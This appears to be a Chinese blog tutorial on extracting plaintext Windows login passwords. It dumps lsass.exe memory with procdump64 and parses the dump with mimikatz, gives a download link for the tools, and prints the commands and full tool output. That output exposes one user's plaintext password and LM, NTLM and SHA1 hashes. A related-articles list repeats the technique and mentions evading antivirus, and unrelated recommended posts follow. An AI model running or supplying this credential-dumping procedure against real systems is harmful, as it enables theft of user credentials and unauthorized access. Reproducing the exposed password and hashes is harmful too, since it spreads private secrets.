使用procdump64+mimikatz可实现从内存中获取明文密码

工具

链接:https://pan.baidu.com/s/1gNc9qLcNSNBohIVrAiqShw 密码:fc38

首先得先获取到内存文件lsass.exe进程, 它用于本地安全和登陆策略,一般在进程管理器中能看到, 比如这样

1.导出lsass.exe

procdump64.exe -accepteula -ma lsass.exe lsass.dmp

(注:必须使用管理员权限)

ProcDump v8.0 - Writes process dump files

Copyright (C) 2009-2016 Mark Russinovich

Sysinternals - www.sysinternals.com

With contributions from Andrew Richards

[15:33:26] Dump 1 initiated: C:\Users\chenglee\Desktop\Procdump\lsass.dmp

[15:33:28] Dump 1 writing: Estimated dump file size is 34 MB.

[15:33:28] Dump 1 complete: 34 MB written in 1.4 seconds

[15:33:28] Dump count reached.

2.执行mimikatz

mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit

(注:必须使用管理员权限)

ECHO 处于打开状态。

  .#####.   mimikatz 2.1.1 (x64) built on Jun 16 2018 18:49:05 - lil!

 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)

 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )

 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz

 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )

  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

mimikatz(commandline) # sekurlsa::minidump lsass.dmp

Switch to MINIDUMP : 'lsass.dmp'

mimikatz(commandline) # sekurlsa::logonPasswords full

Opening : 'lsass.dmp' file for minidump...

Authentication Id : 0 ; 137859 (00000000:00021a83)

Session           : Interactive from 1

User Name         : chenglee

Domain            : chenglee-PC

Logon Server      : CHENGLEE-PC

Logon Time        : 2018/7/25 15:06:35

SID               : S-1-5-21-452281122-3045282507-3243563612-1000

	msv :

	 [00000003] Primary

	 * Username : chenglee

	 * Domain   : chenglee-PC

	 * LM       : 9cffd5e7eefa14babacbf0b4adf55fde

	 * NTLM     : 8d0f8e1a18236379538411a9056799f5

	 * SHA1     : 989281f47698b73e026160e842d86bc64c9e3c20

	tspkg :

	 * Username : chenglee

	 * Domain   : chenglee-PC

	 * Password : lizhenghua

	wdigest :

	 * Username : chenglee

	 * Domain   : chenglee-PC

	 * Password : lizhenghua

	kerberos :

	 * Username : chenglee

	 * Domain   : chenglee-PC

	 * Password : lizhenghua

	ssp :

	credman :	

Authentication Id : 0 ; 137821 (00000000:00021a5d)

Session           : Interactive from 1

User Name         : chenglee

Domain            : chenglee-PC

Logon Server      : CHENGLEE-PC

Logon Time        : 2018/7/25 15:06:35

SID               : S-1-5-21-452281122-3045282507-3243563612-1000

	msv :

	 [00000003] Primary

	 * Username : chenglee

	 * Domain   : chenglee-PC

	 * LM       : 9cffd5e7eefa14babacbf0b4adf55fde

	 * NTLM     : 8d0f8e1a18236379538411a9056799f5

	 * SHA1     : 989281f47698b73e026160e842d86bc64c9e3c20

	tspkg :

	 * Username : chenglee

	 * Domain   : chenglee-PC

	 * Password : lizhenghua

	wdigest :

	 * Username : chenglee

	 * Domain   : chenglee-PC

	 * Password : lizhenghua

	kerberos :

	 * Username : chenglee

	 * Domain   : chenglee-PC

	 * Password : lizhenghua

	ssp :

	credman :	

Authentication Id : 0 ; 997 (00000000:000003e5)

Session           : Service from 0

User Name         : LOCAL SERVICE

Domain            : NT AUTHORITY

Logon Server      : (null)

Logon Time        : 2018/7/25 15:06:15

SID               : S-1-5-19

	msv :

	tspkg :

	wdigest :

	 * Username : (null)

	 * Domain   : (null)

	 * Password : (null)

	kerberos :

	 * Username : (null)

	 * Domain   : (null)

	 * Password : (null)

	ssp :

	credman :	

Authentication Id : 0 ; 996 (00000000:000003e4)

Session           : Service from 0

User Name         : CHENGLEE-PC$

Domain            : WORKGROUP

Logon Server      : (null)

Logon Time        : 2018/7/25 15:06:15

SID               : S-1-5-20

	msv :

	tspkg :

	wdigest :

	 * Username : CHENGLEE-PC$

	 * Domain   : WORKGROUP

	 * Password : (null)

	kerberos :

	 * Username : chenglee-pc$

	 * Domain   : WORKGROUP

	 * Password : (null)

	ssp :

	credman :	

Authentication Id : 0 ; 48630 (00000000:0000bdf6)

Session           : UndefinedLogonType from 0

User Name         : (null)

Domain            : (null)

Logon Server      : (null)

Logon Time        : 2018/7/25 15:06:06

SID               :

	msv :

	tspkg :

	wdigest :

	kerberos :

	ssp :

	credman :	

Authentication Id : 0 ; 999 (00000000:000003e7)

Session           : UndefinedLogonType from 0

User Name         : CHENGLEE-PC$

Domain            : WORKGROUP

Logon Server      : (null)

Logon Time        : 2018/7/25 15:06:05

SID               : S-1-5-18

	msv :

	tspkg :

	wdigest :

	 * Username : CHENGLEE-PC$

	 * Domain   : WORKGROUP

	 * Password : (null)

	kerberos :

	 * Username : chenglee-pc$

	 * Domain   : WORKGROUP

	 * Password : (null)

	ssp :

	credman :	

mimikatz(commandline) # exit

Bye!

看, 密码[lizhenghua]处于明文暴露状态.

如果不是使用管理员模式运行cmd会报错,

两步完成利用procdump64+mimikatz获取win用户密码的更多相关文章

  1. procdump64+mimikatz获取win用户hash密码

    1.导出lsass.exe procdump64.exe -accepteula -ma lsass.exe lsass.dmp 2.执行mimikatz mimikatz.exe "sek ...

  2. 微信公众平台开发—利用OAuth2.0获取微信用户基本信息

    在借鉴前两篇获取微信用户基本信息的基础下,本人也总结整理了一些个人笔记:如何通过OAuth2.0获取微信用户信息 1.首先在某微信平台下配置OAuth2.0授权回调页面: 2.通过appid构造url ...

  3. SpringBoot中获取微信用户信息从未如此简单!

    前言 不知道你是否参加过拼多多上邀请微信好友砍价功能,这个功能实现首先需要考虑的就是获取微信用户的信息.获取用户信息就是获取公众号下微信用户的信息,今天我就来讲讲如何从公众号下获取微信用户信息. 需要 ...

  4. 利用procdump+Mimikatz 绕过杀软获取Windows明文密码(转)

    Mimikatz现在已经内置在Metasploit’s meterpreter里面,我们可以通过meterpreter下载.但是你如果觉得还要考虑杀毒软件,绑定payload之类的东西太过复杂,我们可 ...

  5. Android 两步搞定Fragment的返回键

    Fragment可以说是在Android开发必需要使用到技术,项目中的界面基本上都是使用Fragment来实现,而Activity只是作为Fragment的载体,但有些特殊情况下Fragment也不得 ...

  6. Kubernetes 两步验证 - 使用 Serverless 实现动态准入控制

    作者:CODING - 王炜 1. 背景 如果对 Kubernetes 集群安全特别关注,那么我们可能想要实现这些需求: 如何实现 Kubernetes 集群的两步验证,除了集群凭据,还需要提供一次性 ...

  7. 七牛云如何绑定二次验证码_虚拟MFA_两步验证_谷歌身份验证器?

    一般情况下,点账户名——账户设置——安全设置,即可开通两步验证 具体步骤见链接  七牛云如何绑定二次验证码_虚拟MFA_两步验证_谷歌身份验证器?   二次验证码小程序(官网)对比谷歌身份验证器APP ...

  8. 挑子学习笔记:两步聚类算法(TwoStep Cluster Algorithm)——改进的BIRCH算法

    转载请标明出处:http://www.cnblogs.com/tiaozistudy/p/twostep_cluster_algorithm.html 两步聚类算法是在SPSS Modeler中使用的 ...

  9. 每次Xcode 升级之后 插件失效,两步解决

    以下内容来源:http://www.cocoachina.com/bbs/read.php?tid=296269 每次Xcode 升级之后 插件失效,两步解决 1.打开终端,输入以下代码获取到DVTP ...

随机推荐

  1. Python Anaconda使用

    选择Python 科学计算器发行版 Python用于科学计算的一些常用工具和库 IPython-增强的交互环境:支持变量自动补全,自动缩进,支持 bash shell 命令,内置了许多很有用的功能和函 ...

  2. iOS UI调试神器,插件injection for Xcode使用方法

    项目越来越大,代码编译时间越来越长,你是不是早已经厌倦了改一点点UI布局就要重新编译一次项目的过程,我们一分钟几百万上下的,怎能被编译浪费掉珍贵的时间.使用injectionforxcode这款插件, ...

  3. OEMCC 13.2 集群版本安装部署

    之前测试部署过OEMCC 13.2单机,具体可参考之前随笔: OEMCC 13.2 安装部署 当时环境:两台主机,系统RHEL 6.5,分别部署OMS和OMR: OMS,也就是OEMCC的服务端 IP ...

  4. URL List by Category

    URLs List AI https://www.cnblogs.com/zlel/p/8882129.html Javascript Promise http://liubin.org/promis ...

  5. MySQL创建外键约束的报错Error : Can't create table '#sql-534_185' (errno: 150)

    总得来说是因为两个表的字段类型不一致,例如: 两个字段的类型或大小不严格匹配,一个为tinyint,另一个为char:或一个为int(10)另一个为int(9)也是不行的,即使都为int(10),但一 ...

  6. 20155228 实验三 敏捷开发与XP实践

    20155228 实验三 敏捷开发与XP实践 实验内容 1. XP基础 2. XP核心实践 3. 相关工具 实验要求 1.没有Linux基础的同学建议先学习<Linux基础入门(新版)>& ...

  7. Extjs4前端开发代码规范参考

    准则:  一致性, 隔离与统一管理, 螺旋式重构改进, 消除重复, 借鉴现有方案 1.    保证系统实现的一致性,寻求一致性方案, 相同或相似功能尽量用统一模式处理: 2.    尽可能使用隔离技术 ...

  8. Class__One HomeWork 实验报告

    石家庄铁道大学信息科学与技术学院       实验报告 2018年----2019年  第一学期               题目:   四则运算和验证码 课程名称:  JAVA语言程序设计 班    ...

  9. ATM取款机

    package Tests; import java.io.BufferedReader;import java.io.File;import java.io.FileInputStream;impo ...

  10. 转:SQL Server游标的使用

    使用游标步骤:1.在某个查询的基础上声明游标 --声明游标 declare c_Customers cursor for --查询所有店铺客户的客户编号 下面我们来看游标定义的参数: LOCAL和GL ...